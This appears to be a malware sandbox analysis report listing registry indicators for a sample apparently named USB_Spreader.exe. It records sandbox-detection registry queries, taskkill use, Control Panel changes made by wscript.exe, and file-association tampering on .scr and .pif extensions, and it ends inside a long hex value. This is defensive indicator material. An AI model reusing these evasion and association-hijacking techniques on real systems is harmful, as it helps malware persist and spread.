\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID explorer.exe -
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 14 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS SearchHost.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU SearchHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Kills process with taskkill 1 IoCs
pid Process 2984 taskkill.exe -
Modifies Control Panel 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000\Control Panel\International\s2359 = "Bolbi" wscript.exe Key created \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000\Control Panel\Desktop wscript.exe Key created \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000\Control Panel\International wscript.exe Set value (str) \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000\Control Panel\International\s1159 = "Bolbi" wscript.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe Key created \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe Key created \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000\Software\Microsoft\Internet Explorer\GPU SearchHost.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133725560712552596" chrome.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "14824" SearchHost.exe Set value (int) \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "8397" SearchHost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.scr cmd.exe Key created \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 USB_Spreader.exe Set value (int) \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "1022" SearchHost.exe Set value (int) \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "8397" SearchHost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000} 7z2408-x64.exe Key created \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\1 USB_Spreader.exe Set value (data) \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHost = 6801000088020000 explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "1022" SearchHost.exe Set value (int) \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "1055" SearchHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip32.dll" 7z2408-x64.exe Key created \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings OpenWith.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.pif\ = "dllfile" cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.lnk cmd.exe Set value (int) \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "13375" SearchHost.exe Set value (data) \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 USB_Spreader.exe Set value (data) \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{088e3905-0323-4b02-9826-5d99428e115f}\Instance\ explorer.exe Key created \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings USB_Spreader.exe Set value (int) \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" USB_Spreader.exe Key created \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\bing.com SearchHost.exe Key created \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy USB_Spreader.exe Key created \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings chrome.exe Key created \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} USB_Spreader.exe Key created \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "1055" SearchHost.exe Key created \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total SearchHost.exe Set value (int) \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "8397" SearchHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" 7z2408-x64.exe Set value (data) \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff USB_Spreader.exe Set value (int) \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" USB_Spreader.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-661032028-162657920-1226909816-1000\{5CDE717C-A6BA-42B4-AAEF-8B01B6E125EB} explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "14824" SearchHost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip 7z2408-x64.exe Set value (int) \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" USB_Spreader.exe Key created \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\c26203af4b3e9c81a9e634178b603601_auto_file\shell OpenWith.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.scr\ = "dllfile" cmd.exe Key created \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage SearchHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip.dll" 7z2408-x64.exe Key created \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10 USB_Spreader.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.pif cmd.exe Set value (int) \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" USB_Spreader.exe Set value (str) \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" SearchHost.exe Key created \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags USB_Spreader.exe Key created \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DomStorageState SearchHost.exe Key created \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total SearchHost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip 7z2408-x64.exe Key created \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage SearchHost.exe Key created \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\c26203af4b3e9c81a9e634178b603601_auto_file OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\c26203af4b3e9c81a9e634178b603601_auto_file\shell\Read OpenWith.exe Set value (int) \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "1022" SearchHost.exe Set value (data) \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\PastIconsStream = 1400000005000000010001000200000014000000494c2006020004002c0010001000ffffffff2110ffffffffffffffff424d360000000000000036000000280000001000000040000000010020000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000ff00000060000000000000000000000020000000b0000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff00000060000000200000000000000020000000f00d0d0df09d9d9dffc8c8c8ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ff8f8f8fff000000ff000000603f3f3f66000000ff00000060000000900a0a0af0c0c0c0ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e